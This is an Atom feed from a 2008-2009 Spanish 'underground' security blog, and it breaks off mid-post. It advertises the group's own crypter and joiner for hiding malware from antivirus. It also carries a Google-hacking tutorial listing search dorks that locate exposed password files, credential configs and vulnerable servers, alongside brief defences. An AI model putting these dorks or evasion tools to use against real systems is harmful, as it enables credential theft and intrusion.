<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5908420914672444840</id><updated>2011-07-31T03:18:15.272-07:00</updated><category term='Temas libres'/><category term='Software propio'/><category term='Seguridad Web'/><category term='Bienvenida'/><category term='Imagenes'/><category term='Google'/><category term='Deface'/><category term='Cifrado con GPG'/><category term='Linux'/><category term='Wifi'/><title type='text'>Pirates of the routers security team</title><subtitle type='html'>Blog dedicado a la seguridad y contraseguridad informatica y el underground</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>13</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-3379249855839824854</id><published>2009-12-16T07:57:00.001-08:00</published><updated>2009-12-16T07:58:25.723-08:00</updated><title type='text'>NUEVA PAGINA</title><content type='html'>Saludos a tod@s los visitantes del blog. Nos hemos trasladado a una nueva página con foro, la dirección es la siguiente:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://piratesoftherouters.cz.cc/"&gt;Pirates of the routers&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-3379249855839824854?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/3379249855839824854/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/12/nueva-pagina.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/3379249855839824854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/3379249855839824854'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/12/nueva-pagina.html' title='NUEVA PAGINA'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-5631799093830145814</id><published>2009-12-10T16:30:00.000-08:00</published><updated>2009-12-10T17:18:17.364-08:00</updated><title type='text'>Pirates Of The Routers - Crypt</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yn8Xfyo8q2o/SyGTuTS4quI/AAAAAAAAAA8/G8iEvjW0THE/s1600-h/Pirates-Crypt1.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://1.bp.blogspot.com/_yn8Xfyo8q2o/SyGTuTS4quI/AAAAAAAAAA8/G8iEvjW0THE/s320/Pirates-Crypt1.JPG" alt="" id="BLOGGER_PHOTO_ID_5413770650738797282" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_yn8Xfyo8q2o/SyGTos85rOI/AAAAAAAAAA0/T7C_0L7N-AM/s1600-h/Pirates-Crypt.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://3.bp.blogspot.com/_yn8Xfyo8q2o/SyGTos85rOI/AAAAAAAAAA0/T7C_0L7N-AM/s320/Pirates-Crypt.JPG" alt="" id="BLOGGER_PHOTO_ID_5413770554546695394" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Codeado para Pirates Of The Routers&lt;br /&gt;&lt;br /&gt;Coder: GodHack&lt;br /&gt;&lt;br /&gt;Info: 100% Runtime + Scantime&lt;br /&gt;&lt;br /&gt;Compilado en VB6&lt;br /&gt;&lt;br /&gt;Escaneado :  http://virusscan.jotti.org/es/scanresult/a177bb5980a263969db63a7ba5b0cce18f4756b6&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-5631799093830145814?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/5631799093830145814/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/12/pirates-of-routers-crypt.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5631799093830145814'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5631799093830145814'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/12/pirates-of-routers-crypt.html' title='Pirates Of The Routers - Crypt'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_yn8Xfyo8q2o/SyGTuTS4quI/AAAAAAAAAA8/G8iEvjW0THE/s72-c/Pirates-Crypt1.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-7222475650033132710</id><published>2009-12-10T16:27:00.000-08:00</published><updated>2009-12-10T16:35:32.010-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Software propio'/><title type='text'>APLICACIONES PIRATES OF THE ROUTERS</title><content type='html'>BUENO COMPAÑEROS, DESPUES DE UN TIEMPO OFFLINE PIRATES OF THE ROUTERS VUELVE Y MAS FUERTE QUE NUNCA NOS HEMOS PROPUESTO CREAR SOFTWARE.&lt;br /&gt;&lt;br /&gt;PIRATES JOINER V 1.0&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;Joiner para juntar archivo (perfecto para ocultar malwares)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_yn8Xfyo8q2o/SyGS8CPjmtI/AAAAAAAAAAk/vAKFfNnBI3I/s1600-h/piratesjoiner.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 216px;" src="http://3.bp.blogspot.com/_yn8Xfyo8q2o/SyGS8CPjmtI/AAAAAAAAAAk/vAKFfNnBI3I/s320/piratesjoiner.jpg" alt="" id="BLOGGER_PHOTO_ID_5413769787167972050" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;PIRATES OF THE ROUTERS CRYPT&lt;br /&gt;&lt;br /&gt;Crypter para que no detecten tus malware&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yn8Xfyo8q2o/SyGTkFCNW9I/AAAAAAAAAAs/cvFAn_8SSUQ/s1600-h/crypt.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 307px;" src="http://1.bp.blogspot.com/_yn8Xfyo8q2o/SyGTkFCNW9I/AAAAAAAAAAs/cvFAn_8SSUQ/s320/crypt.jpg" alt="" id="BLOGGER_PHOTO_ID_5413770475112061906" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Y esto no es todo por que dentro de poco nos espera muuuuchoooo mas!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-7222475650033132710?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/7222475650033132710/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/12/aplicaciones-pirates-of-routers.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/7222475650033132710'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/7222475650033132710'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/12/aplicaciones-pirates-of-routers.html' title='APLICACIONES PIRATES OF THE ROUTERS'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_yn8Xfyo8q2o/SyGS8CPjmtI/AAAAAAAAAAk/vAKFfNnBI3I/s72-c/piratesjoiner.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-619974445165421523</id><published>2009-06-27T19:48:00.000-07:00</published><updated>2009-06-27T19:50:18.496-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Imagenes'/><title type='text'></title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_yn8Xfyo8q2o/SkbaTYmeUWI/AAAAAAAAAAc/4BShDdSsUnc/s1600-h/Pirates+of+the+routers.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 200px;" src="http://4.bp.blogspot.com/_yn8Xfyo8q2o/SkbaTYmeUWI/AAAAAAAAAAc/4BShDdSsUnc/s320/Pirates+of+the+routers.png" alt="" id="BLOGGER_PHOTO_ID_5352205233732604258" border="0" /&gt;&lt;/a&gt;Faltaba mi imagen jajaja&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-619974445165421523?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/619974445165421523/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/06/faltaba-mi-imagen-jajaja.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/619974445165421523'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/619974445165421523'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/06/faltaba-mi-imagen-jajaja.html' title=''/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_yn8Xfyo8q2o/SkbaTYmeUWI/AAAAAAAAAAc/4BShDdSsUnc/s72-c/Pirates+of+the+routers.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-5315811710140559812</id><published>2009-04-15T11:41:00.000-07:00</published><updated>2009-04-15T11:44:05.205-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Temas libres'/><title type='text'>Dibujo nuevo :)</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yn8Xfyo8q2o/SeYqxy_ZsuI/AAAAAAAAAAU/cFNzPRKIgSs/s1600-h/mijonarix.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 226px; height: 320px;" src="http://1.bp.blogspot.com/_yn8Xfyo8q2o/SeYqxy_ZsuI/AAAAAAAAAAU/cFNzPRKIgSs/s320/mijonarix.jpg" alt="" id="BLOGGER_PHOTO_ID_5324990644401844962" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Gracias a mi compañero de clase, cursillos y trabajo os presento aquí el pedazo de dibujo que se ha currado para nosotros :)&lt;br /&gt;Si en el fondo aunque sea un poco capullo es majo jaja este apartado va dedicado a el!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-5315811710140559812?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/5315811710140559812/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/04/dibujo-nuevo.html#comment-form' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5315811710140559812'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5315811710140559812'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/04/dibujo-nuevo.html' title='Dibujo nuevo :)'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_yn8Xfyo8q2o/SeYqxy_ZsuI/AAAAAAAAAAU/cFNzPRKIgSs/s72-c/mijonarix.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-5019658084377073275</id><published>2009-04-05T03:48:00.000-07:00</published><updated>2009-04-05T03:52:39.306-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Google'/><title type='text'></title><content type='html'>&lt;span style="font-weight:bold;"&gt;GOOGLE HACKING&lt;br /&gt;por iLuN&lt;br /&gt;&lt;/span&gt;&lt;br /&gt; Google es el buscador mas famoso y tecnológicamente mas avanzado que hay hoy en día. Como todos sabemos Google nos permite hacer búsquedas de información mediante palabras, pero no solo eso, también nos permite encontrar información sensible.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;¿Entonces, en que consiste el google hack?&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Resumiendo, Google hacking es el metodo de busqueda por el cual encontramos información sensible.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Métodos de Google hack&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Pasemos a la parte practica, vamos a realizar unas cuantas búsquedas de información sensible:&lt;br /&gt;Para ello debemos escribir el código que pongo debajo de el texto subrayado en el buscador.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;1.- Productos vulnerables&lt;/span&gt; &lt;br /&gt;&lt;br /&gt;"Powered by MercuryBoard [v1"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;2.-Mensajes de error&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; "Warning: mysql_query()" "invalid query"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;3.-Ficheros que contienen información sensible&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; "Index of" / "chat/logs"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;4.-Ficheros que contienen claves&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;5.-Ficheros que contienen nombres de usuario&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;filetype:conf inurl:proftpd.conf -sample&lt;br /&gt;&lt;br /&gt;/* Yo este es el que mas uso, porque si os dais cuenta con esta busqueda encontramos la información sensible del servidor y si sabemos algo de linux ( en mi caso lo que utilizo) podemos divertirnos mucho). &lt;br /&gt;&lt;br /&gt;Os voy a dar una pista, dos archivos de configuración importantes en linux:&lt;br /&gt; -password.conf&lt;br /&gt; -shadow.conf&lt;br /&gt;&lt;br /&gt;Ale a investigar un poco como lo hariamos, no todo hiba a ser tan sencillo no? Asi que a estrujar la mente caballeros y señoritas :)&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;6.-Footholds e información de apoyo al acceso&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; +htpasswd +WS_FTP.LOG filetype:log&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;7.-Páginas con formularios de acceso &lt;/span&gt;&lt;br /&gt;&lt;br /&gt; "You have requested access to a restricted area of our website. Please authenticate yourself to continue."&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;8.-Páginas que contienen datos relativos a vulnerabilidades&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; filetype:pdf "Assessment Report" nessus&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;9.-Directorios sensibles&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;filetype:cfg ks intext:rootpw -sample -test -howto&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;10.-Información sensible sobre comercio y banca electrónica&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; inurl:shopdbtest.asp&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;11.-Dispositivos hardware online&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; camera linksys inurl:main.cgi&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;12.-Ficheros vulnerables&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;intitle:"Directory Listing" "tree view"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;13.-Servidores vulnerables&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;intitle:"Mail Server CMailServer Webmail" "5.2"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;14.-Detección de servidores web&lt;/span&gt;&lt;br /&gt;&lt;br /&gt; intitle:"Welcome to Windows Small Business Server 2003"&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;&lt;br /&gt;Protegernos de Google hack!&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Como todo ataque tiene su defensa este no va a ser menos...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.Asegurare de tener un fichero de robots.txt  bien configurado.&lt;br /&gt;2.Aprende como funciona  el mecanismo de posicionamiento de resultados en Google. &lt;br /&gt;3.Si eres Administrador de sistemas prueba a usar un honeypot especializado. Para este tipo de ataques usa Google Hack Honeypot. (Suelo odiar este tipo de cosas peroooo si queremos protegernos hay que ser mas listos que el hambre xD)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Fuentes:&lt;/span&gt;&lt;br /&gt;http://www.sahw.com/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Y para terminar ... ya sabéis que este manual esta hecho para la educación no para andar jodiendo por hay.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-5019658084377073275?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/5019658084377073275/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/04/google-hacking-por-ilun-google-es-el.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5019658084377073275'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/5019658084377073275'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/04/google-hacking-por-ilun-google-es-el.html' title=''/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-2203481786247704139</id><published>2009-04-03T13:13:00.000-07:00</published><updated>2009-04-03T13:28:52.884-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Wifi'/><title type='text'>Antena Wifi casera</title><content type='html'>&lt;span style="font-weight: bold;"&gt;CONSTRUCCIÓN DE UNA ANTENA WIFI SIMPLE&lt;/span&gt;&lt;br /&gt;                                            por iLuN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a target="_blank" title="ImageShack - Image And Video Hosting" href="http://img150.imageshack.us/my.php?image=1001093.jpg"&gt;&lt;img src="http://img150.imageshack.us/img150/3900/1001093.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://g.imageshack.us/img150/1001093.jpg/1/"&gt;&lt;img src="http://img150.imageshack.us/img150/1001093.jpg/1/w320.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;      &lt;span style="font-weight: bold;"&gt;HERRAMIENTAS&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  a) Tarjeta Wifi USB&lt;br /&gt;&lt;br /&gt;  b) Alargador USB&lt;br /&gt;&lt;br /&gt;  c) Lata de conservas ( tomate ...) de tamaño grande&lt;br /&gt;&lt;br /&gt;  d) Cinta aislante&lt;br /&gt;&lt;br /&gt;      &lt;span style="font-weight: bold;"&gt;CREACIÓN&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;1.- Primero hacemos un agujero en la lata de conservas como en la foto de arriba. (Mas o menos a la&lt;br /&gt;misma distancia del culo de la lata)&lt;br /&gt;2.- Metemos la tarjeta Wifi por el agujero de tal forma que quede mas o menos encajado.&lt;br /&gt;3.- Por ultimo con la cinta nos aseguramos de que la tarjeta no se caiga.&lt;br /&gt;&lt;br /&gt;      &lt;span style="font-weight: bold;"&gt;CURIOSIDADES&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Colocando la tarjeta en la lata ganamos 10 db. Donde vivo ( mi balcón da a una plaza) antes del&lt;br /&gt;invento solo veía 10 redes, ahora veo exactamente 23 redes mínimo y 31 máximo.&lt;br /&gt;&lt;br /&gt;&lt;a target='_blank' title='ImageShack - Image And Video Hosting' href='http://img110.imageshack.us/my.php?image=1001090l.jpg'&gt;&lt;img src='http://img110.imageshack.us/img110/2222/1001090l.jpg' border='0'/&gt;&lt;/a&gt;&lt;br/&gt;&lt;a href="http://g.imageshack.us/img110/1001090l.jpg/1/"&gt;&lt;img src="http://img110.imageshack.us/img110/1001090l.jpg/1/w320.png" border="0"&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-2203481786247704139?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/2203481786247704139/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/04/antena-wifi-casera.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/2203481786247704139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/2203481786247704139'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2009/04/antena-wifi-casera.html' title='Antena Wifi casera'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-8393108127223870927</id><published>2008-12-20T12:26:00.000-08:00</published><updated>2008-12-20T12:27:06.462-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><title type='text'>NimbleX, Crea tu Propio Live CD personalizado en SEGUNDOS</title><content type='html'>&lt;div style="text-align: center;"&gt;&lt;img src="http://img364.imageshack.us/img364/6633/sctitlevf9.png" alt="Tu Propio Live CD" title="NimbleX, Crea tu Propio Live CD personalizado en SEGUNDOS" border="0" /&gt;&lt;/div&gt; &lt;p&gt;NimbleX podría ser una simple distribución de GNU/Linux pero ha integrado entre sus opciones de descargas la posibilidad de tener la distribución NimbleX PERSONALIZADA y como live cd.&lt;span id="more-995"&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;Podrás desde cambiarle el wallpaper, hasta seleccionar los paquetes que quieres que tenga.&lt;/p&gt; &lt;p&gt;Muy útil si queremos un live cd Personalizado.&lt;/p&gt; &lt;p&gt;Para descargar tu NimbleX Personalizado puedes entrar a:&lt;br /&gt;&lt;a href="http://custom.nimblex.net/" target="_blank"&gt;custom.nimblex.net&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Para descargar el NimbleX normal&lt;br /&gt;&lt;a href="http://www.nimblex.net/" target="_blank"&gt;nimblex.net&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5908420914672444840-8393108127223870927?l=pirates-of-the-routers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://pirates-of-the-routers.blogspot.com/feeds/8393108127223870927/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/nimblex-crea-tu-propio-live-cd.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/8393108127223870927'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5908420914672444840/posts/default/8393108127223870927'/><link rel='alternate' type='text/html' href='http://pirates-of-the-routers.blogspot.com/2008/12/nimblex-crea-tu-propio-live-cd.html' title='NimbleX, Crea tu Propio Live CD personalizado en SEGUNDOS'/><author><name>Pirates of the routers</name><uri>http://www.blogger.com/profile/15988587769671894053</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5908420914672444840.post-5797149592831021252</id><published>2008-12-20T12:07:00.000-08:00</published><updated>2008-12-20T12:22:49.148-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Linux'/><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad Web'/><title type='text'>Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web</title><content type='html'>&lt;p style="text-align: justify;"&gt;Samurai Web Testing Framework es un entorno de trabajo basado en &lt;span style="text-decoration: underline;"&gt;GNU/LINUX UBUNTU&lt;/span&gt;&lt;a href="http://es.wikipedia.org/wiki/Ubuntu_%28distribuci%C3%B3n_Linux%29" target="_blank"&gt;&lt;/a&gt;, que ha sido pre-configurado para llevar a cabo test de penetracion a aplicativos Web.&lt;/p&gt; &lt;p style="text-align: center;"&gt;&lt;img class="aligncenter" title="Samurai" src="http://img222.imageshack.us/img222/8463/samuraiuo4.jpg" alt="samuraiuo4 Samurai, Entorno de trabajo para el testing de seguridad a aplicativos Web" width="450" height="240" /&gt;&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Este &lt;span style="text-decoration: underline;"&gt;LiveCD&lt;/span&gt;, que además puede ser instalado como sistema operativo por defecto en el disco duro, contiene un repertorio bastante amplio en cuanto a herramientas de libre uso y distribución se refiere. Estas herramientas están destinadas a realizar pen-testing sobre aplicativos Webs.&lt;/p&gt; &lt;p style="text-align: justify;"&gt;Al igual que la distribución &lt;span style="text-decoration: underline;"&gt;BackTrack&lt;/span&gt;, Samurai Web Testing Framework divide las herramientas por grupos según una metodología.&lt;/p&gt;&lt;p style="text-align: justify;"&gt;Comienza por la etapa de &lt;span style="text-decoration: underline;"&gt;rexonicimiento&lt;/span&gt;, para ello hace uso de las herramientas &lt;span style="text-decoration: 